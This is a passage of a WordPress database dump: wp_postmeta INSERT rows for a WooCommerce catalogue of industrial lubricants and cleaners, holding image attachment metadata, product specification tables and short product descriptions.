INSERT INTO `wp_postmeta` VALUES (17842, 1820, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:39:"2016/09/teflon-silicone-lubricant-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"teflon-silicone-lubricant-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"teflon-silicone-lubricant-2-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"teflon-silicone-lubricant-2-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"teflon-silicone-lubricant-2-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"teflon-silicone-lubricant-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"teflon-silicone-lubricant-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"teflon-silicone-lubricant-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"teflon-silicone-lubricant-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17843, 1819, '_thumbnail_id', '1820'); 
INSERT INTO `wp_postmeta` VALUES (17844, 1821, '_wp_attached_file', '2016/09/MS-750-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17845, 1821, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-750-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-750-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-750-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-750-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-750-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-750-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-750-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-750-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-750-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17846, 1263, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17847, 1822, '_wp_attached_file', '2016/09/MS-780-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17848, 1822, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-780-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-780-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-780-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-780-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-780-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-780-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-780-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-780-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-780-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"16";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17849, 1278, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17850, 1823, '_wp_attached_file', '2016/09/MS-530N-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17851, 1823, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/09/MS-530N-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"MS-530N-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"MS-530N-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"MS-530N-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"MS-530N-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"MS-530N-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"MS-530N-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"MS-530N-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"MS-530N-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17852, 1825, '_edit_lock', '1482247026:2'); 
INSERT INTO `wp_postmeta` VALUES (17853, 1825, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17865, 1828, '_wp_attached_file', '2016/08/vazo-frs-product-banner-e1474375765567.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17866, 1828, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:100;s:6:"height";i:79;s:4:"file";s:50:"2016/08/vazo-frs-product-banner-e1474375765567.jpg";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17867, 1828, '_edit_lock', '1474375623:2'); 
INSERT INTO `wp_postmeta` VALUES (17868, 1828, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:100;s:6:"height";i:79;s:4:"file";s:27:"vazo-frs-product-banner.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (17869, 1831, '_edit_lock', '1474376991:3'); 
INSERT INTO `wp_postmeta` VALUES (17870, 1831, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17871, 1832, '_wp_attached_file', '2016/09/MS-752U.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17872, 1832, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-752U.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-752U-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-752U-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-752U-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-752U-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-752U-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-752U-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-752U-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-752U-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17873, 1833, '_wp_attached_file', '2016/09/MS-752U-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17874, 1833, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/09/MS-752U-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"MS-752U-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"MS-752U-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"MS-752U-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"MS-752U-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"MS-752U-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"MS-752U-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"MS-752U-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"MS-752U-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17875, 1834, '_edit_lock', '1492099946:3'); 
INSERT INTO `wp_postmeta` VALUES (17876, 1835, '_wp_attached_file', '2016/09/MS-752U-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17877, 1835, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/09/MS-752U-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"MS-752U-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"MS-752U-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"MS-752U-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"MS-752U-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"MS-752U-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"MS-752U-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"MS-752U-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"MS-752U-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17878, 1834, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17879, 1836, '_edit_lock', '1482164580:3'); 
INSERT INTO `wp_postmeta` VALUES (17880, 1836, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17885, 1836, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17886, 1836, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17887, 1836, '312_default_editor', '<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Viscosity cSt @ 40°C</td>\r\n<td style="text-align: center;" width="180">16.8</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity Index</td>\r\n<td style="text-align: center;">124</td>\r\n</tr>\r\n<tr>\r\n<td>Pour Point</td>\r\n<td style="text-align: center;">-69°C</td>\r\n</tr>\r\n<tr>\r\n<td>Volatility, wt%</td>\r\n<td style="text-align: center;">13</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">37°C</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content of MS-538</td>\r\n<td style="text-align: center;">437g/l</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content of MS-539</td>\r\n<td style="text-align: center;">375g/l</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17888, 1836, '1367_default_editor', '<strong>MS-538 </strong>(14 oz Aerosol)\r\n<strong>MS-539 </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (17889, 1836, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17890, 1836, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17891, 1836, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17892, 1836, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17893, 1836, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17894, 1836, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17895, 1836, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17896, 1836, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17897, 1836, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17898, 1836, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17899, 1836, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17900, 1836, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17901, 1836, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17902, 1836, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17903, 1836, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17904, 1836, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17905, 1836, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17906, 1836, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17907, 1836, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17908, 1836, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17909, 1836, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17910, 1836, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17911, 1836, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17912, 1836, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17913, 1836, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17914, 1836, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17915, 1836, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17916, 1836, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17917, 1836, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17918, 1836, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17919, 1836, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17920, 1836, '_ywtm_content_tab_description', 'Excellent for cleaning and lubricating contacts, switches, relays, tuners, encoders, slide wires, rheostats, distribution panels and servomechanisms to restore electrical and mechanical continuity. Contains a high performance synthetic hydrocarbon oil. Contains no silicones. For lubricating multi-pin connectors, use MS-381HC/MS-383H Connector Lubricant.'); 
INSERT INTO `wp_postmeta` VALUES (17921, 1836, '_product_image_gallery', '1856'); 
INSERT INTO `wp_postmeta` VALUES (17922, 1840, '_edit_lock', '1482166711:3'); 
INSERT INTO `wp_postmeta` VALUES (17923, 1840, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (17924, 1840, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17925, 1840, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17926, 1840, '312_default_editor', '<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Dielectric Breakdown Voltage</td>\r\n<td style="text-align: center;" width="180">38 to 41 kV/0.1 in</td>\r\n</tr>\r\n<tr>\r\n<td>Useful Temperature Range</td>\r\n<td style="text-align: center;">-70°-66°C</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Viscosity</td>\r\n<td style="text-align: center;">12.4 cSt @ 20°C</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">60°C</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">1.5 g/ml @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Aerosol</td>\r\n<td style="text-align: center;">132 gms/l</td>\r\n</tr>\r\n<tr>\r\n<td>Bulk</td>\r\n<td style="text-align: center;">162 gms/l</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17927, 1840, '1367_default_editor', '<strong>MS-738 </strong>(12 oz Aerosol)\r\n<strong>MS-738M </strong>(8 oz Aerosol)\r\n<strong>MS-739 </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (17928, 1840, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17929, 1840, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17930, 1840, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17931, 1840, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17932, 1840, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17933, 1840, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17934, 1840, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17935, 1840, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17936, 1840, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17937, 1840, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17938, 1840, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17939, 1840, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17940, 1840, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17941, 1840, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17942, 1840, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17943, 1840, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17944, 1840, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17945, 1840, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17946, 1840, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17947, 1840, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17948, 1840, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17949, 1840, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17950, 1840, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17951, 1840, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17952, 1840, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17953, 1840, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17954, 1840, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17955, 1840, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17956, 1840, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17957, 1840, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (17958, 1840, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (17959, 1840, '_ywtm_content_tab_description', 'Excellent for cleaning and lubricating switches, relays, distribution panels and servomechanisms. Contains a high performance fluorinated synthetic oil in an HFE solvent cleaner. Contains no silicones. For lubricating multi-pin connectors, use MS-381HC/MS-383H Connector Lubricant.'); 
INSERT INTO `wp_postmeta` VALUES (17960, 1840, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17961, 1841, '_wp_attached_file', '2016/09/MS-752U-ultrapure.docx'); 
INSERT INTO `wp_postmeta` VALUES (17962, 1834, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17963, 1834, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17964, 1834, '312_default_editor', '<table style="height: 326px;" width="537">\r\n<tbody>\r\n<tr>\r\n<td width="232"><strong>Properties</strong></td>\r\n<td width="118"><strong>Unit</strong></td>\r\n<td width="147"><strong>Specifications</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="232"></td>\r\n<td width="118"></td>\r\n<td width="147"></td>\r\n</tr>\r\n<tr>\r\n<td width="232">Specific Gravity</td>\r\n<td width="118">g/mL</td>\r\n<td width="147">1.41</td>\r\n</tr>\r\n<tr>\r\n<td width="232">pH</td>\r\n<td width="118"></td>\r\n<td width="147">6.5 – 7.2</td>\r\n</tr>\r\n<tr>\r\n<td width="232">Total Purity</td>\r\n<td width="118">wt%</td>\r\n<td width="147">99.999 min</td>\r\n</tr>\r\n<tr>\r\n<td width="232">Non-Volatile Residue</td>\r\n<td width="118">ppm, wt</td>\r\n<td width="147">≤1.0 ppm</td>\r\n</tr>\r\n<tr>\r\n<td width="232">Particle count</td>\r\n<td width="118">mg/L</td>\r\n<td width="147">0.00</td>\r\n</tr>\r\n<tr>\r\n<td width="232">Moisture</td>\r\n<td width="118">ppm wt</td>\r\n<td width="147">75 ppm max</td>\r\n</tr>\r\n<tr>\r\n<td width="232">Acidity (as HCl)</td>\r\n<td width="118">ppm wt</td>\r\n<td width="147">1.0 max</td>\r\n</tr>\r\n<tr>\r\n<td width="232">Appearance</td>\r\n<td 